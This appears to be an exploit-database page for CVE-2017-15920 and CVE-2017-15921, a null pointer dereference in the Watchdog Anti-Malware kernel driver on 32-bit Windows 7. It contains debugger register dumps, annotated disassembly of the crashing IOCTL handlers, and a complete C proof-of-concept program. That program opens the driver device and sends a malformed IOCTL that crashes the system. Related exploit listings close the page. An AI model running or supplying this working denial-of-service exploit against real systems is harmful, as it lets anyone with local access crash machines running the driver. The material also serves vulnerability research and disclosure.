Menu

Search for hundreds of thousands of exploits

"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference"

Author

Exploit author

"Parvez Anwar"

Platform

Exploit platform

windows

Release date

Exploit published date

2017-10-26

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
/*

Exploit Title    - Watchdog Development Anti-Malware/Online Security Pro Null Pointer Dereference
Date             - 26th October 2017
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.watchdogdevelopment.com/
Tested Version   - 2.74.186.150
Driver Version   - 2.21.63 - zam32.sys
Tested on OS     - 32bit Windows 7 SP1 
CVE IDs          - CVE-2017-15920 and CVE-2017-15921
Vendor fix url   - Will be fixed in a future release
Fixed Version    - n/a
Fixed driver ver - n/a



A null pointer dereference vulnerability is triggered when sending an operation
to ioctls 0x80002010 or 0x80002054. This is due to input buffer being NULL or
the input buffer size being 0 as they are not validated.

kd> dt nt!_irp @esi -r
   +0x000 Type             : 0n6
   +0x002 Size             : 0x94
   +0x004 MdlAddress       : (null) 
   +0x008 Flags            : 0x60000
   +0x00c AssociatedIrp    : <unnamed-tag>
      +0x000 MasterIrp        : (null) 
      +0x000 IrpCount         : 0n0
      +0x000 SystemBuffer     : (null)  <----------- null pointer


0x80002010
----------
CVE-2017-15921

kd> r
eax=00000000 ebx=80002010 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087cd9f esp=a7a80ab8 ebp=a7a80ab8 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
zam32+0xdd9f:
9087cd9f ff30            push    dword ptr [eax]      ds:0023:00000000=????????


.text:90AD9104                 push    offset aIoctl_register                        ; "IOCTL_REGISTER_PROCESS"
.text:90AD9109                 push    0                                             
.text:90AD910B                 push    edx                                           ; Pointer to "DeviceIoControlHandler" string
.text:90AD910C                 push    208h
.text:90AD9111                 push    offset aMain_c                                
.text:90AD9116                 push    1
.text:90AD9118                 call    sub_90AD3ADA
.text:90AD911D                 add     esp, 18h
.text:90AD9120                 push    esi                                           ; esi is null becomes arg_0 otherwise would point to our input "SystemBuffer"
.text:90AD9121                 call    sub_90AD8D90

.text:90AD8D90 sub_90AD8D90    proc near                                             
.text:90AD8D90
.text:90AD8D90 arg_0           = dword ptr  8
.text:90AD8D90
.text:90AD8D90                 push    ebp                                           
.text:90AD8D91                 mov     ebp, esp
.text:90AD8D93                 call    sub_90AD414A
.text:90AD8D98                 test    eax, eax
.text:90AD8D9A                 jz      short loc_90AD8DA6
.text:90AD8D9C                 mov     eax, [ebp+arg_0]                              ; Null pointer dereference 
.text:90AD8D9F                 push    dword ptr [eax]                               ; BSOD !!!!
.text:90AD8DA1                 call    sub_90AD428C
.text:90AD8DA6
.text:90AD8DA6 loc_90AD8DA6:                                                         
.text:90AD8DA6                 pop     ebp
.text:90AD8DA7                 retn    4
.text:90AD8DA7 sub_90AD8D90    endp
.text:90AD8DA7
.text:90AD8DAA


0x80002054
----------
CVE-2017-15920

kd> r
eax=861e8320 ebx=80002054 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087d41a esp=99f4eaac ebp=99f4eadc iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
zam32+0xe41a:
9087d41a c7061e010000    mov     dword ptr [esi],11Eh ds:0023:00000000=????????


.text:90AD9401                 push    offset aIoctl_get_driv                        ; IOCTL_GET_DRIVER_PROTOCOL
.text:90AD9406                 push    0
.text:90AD9408                 push    edx
.text:90AD9409                 push    2A3h
.text:90AD940E                 push    offset aMain_c                                
.text:90AD9413                 push    1
.text:90AD9415                 call    sub_90AD3ADA
.text:90AD941A                 mov     dword ptr [esi], 11Eh                         ; BSOD !!!! Null pointer dereference otherwise would point to our input "SystemBuffer"
.text:90AD9420                 jmp     loc_90AD9622


*/


#include <stdio.h>
#include <windows.h>

int main(int argc, char *argv[]) 
{
    HANDLE         hDevice;
    char           devhandle[MAX_PATH];
    DWORD          dwRetBytes = 0;


    sprintf(devhandle, "\\\\.\\%s", "zemanaantimalware");

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else 
    {
        printf("\n[+] Open %s device successful", devhandle);
    }	

    printf("\n[~] Press any key to continue . . .");
    getch();

    DeviceIoControl(hDevice, 0x80002010, NULL, 0, NULL, 0, &dwRetBytes, NULL);
//  DeviceIoControl(hDevice, 0x80002054, NULL, 0, NULL, 0, &dwRetBytes, NULL);

    printf("\n[+] DoSed\n\n");
 
    CloseHandle(hDevice);
    return 0;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-01-14 "Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation" local windows "Parvez Anwar"
2018-09-13 "STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation" local windows "Parvez Anwar"
2018-01-30 "System Shield 5.0.0.136 - Privilege Escalation" local windows "Parvez Anwar"
2017-11-13 "IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation" local windows "Parvez Anwar"
2017-11-01 "Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Local Privilege Escalation" local windows "Parvez Anwar"
2017-10-26 "Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference" dos windows "Parvez Anwar"
2017-03-07 "USBPcap 1.1.0.0 (WireShark 2.2.5) - Local Privilege Escalation" local windows "Parvez Anwar"
2017-01-26 "Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow" local windows "Parvez Anwar"
2015-02-11 "SoftSphere DefenseWall FW/IPS 3.24 - Local Privilege Escalation" local windows "Parvez Anwar"
2015-02-04 "K7 Computing (Multiple Products) - Arbitrary Write Privilege Escalation" local windows "Parvez Anwar"
2015-02-04 "AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation" local windows "Parvez Anwar"
2015-02-04 "BullGuard (Multiple Products) - Arbitrary Write Privilege Escalation" local windows "Parvez Anwar"
2015-02-01 "Symantec Altiris Agent 6.9 (Build 648) - Local Privilege Escalation" local windows "Parvez Anwar"
2015-01-31 "Trend Micro 8.0.1133 (Multiple Products) - Local Privilege Escalation" local windows "Parvez Anwar"
2015-01-30 "McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation" local windows "Parvez Anwar"
2015-01-26 "Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation" local windows "Parvez Anwar"
2015-01-20 "Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service" dos windows "Parvez Anwar" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected